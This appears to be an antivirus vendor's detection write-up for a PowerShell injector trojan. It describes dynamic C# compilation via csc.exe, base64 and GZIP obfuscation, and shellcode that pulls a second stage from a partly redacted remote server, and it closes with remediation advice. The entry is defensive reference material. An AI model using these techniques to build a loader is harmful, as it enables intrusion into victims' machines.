PowerShell/Injector.31B0!tr

Analysis

PowerShell/Injector.31B0!tr is a generic detection for a file Injector trojan. Since this is a generic detection, this malware may have varying behaviour.
Below are some of its observed characteristics/behaviours:

• This PowerShell script dynamically compiles malicious C# code that is then injected into PowerShell. Traces of the compiler-generated code may be found in the %Temporary% folder.


• The following command line process is executed to compile the malicious code:
  • "C:\\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"%Temporary%\mafetl_3.cmdline"
• This PowerShell script uses various obfuscation techniques to evade notice. Some techniques that were used are:
  • Encoding in base64.
  • A combination of base64 encoding and GZIP.
• The payload observed for this malware is shellcode that connects to a remote server, such as the following:
  • 89.{removed}.194.236
  
  Once connected, it allocates virtual memory and requests for 0x2000 bytes from the server, which are written to the newly allocated memory. The bytes are expected to be more shellcode, as the trojan then transfers execution to the newly allocated memory.
  The remote server is down at the time of this analysis.

Recommended Action

• Make sure that your FortiGate/FortiClient system is using the latest AV database.
• Quarantine/delete files that are detected and replace infected files with clean backup copies.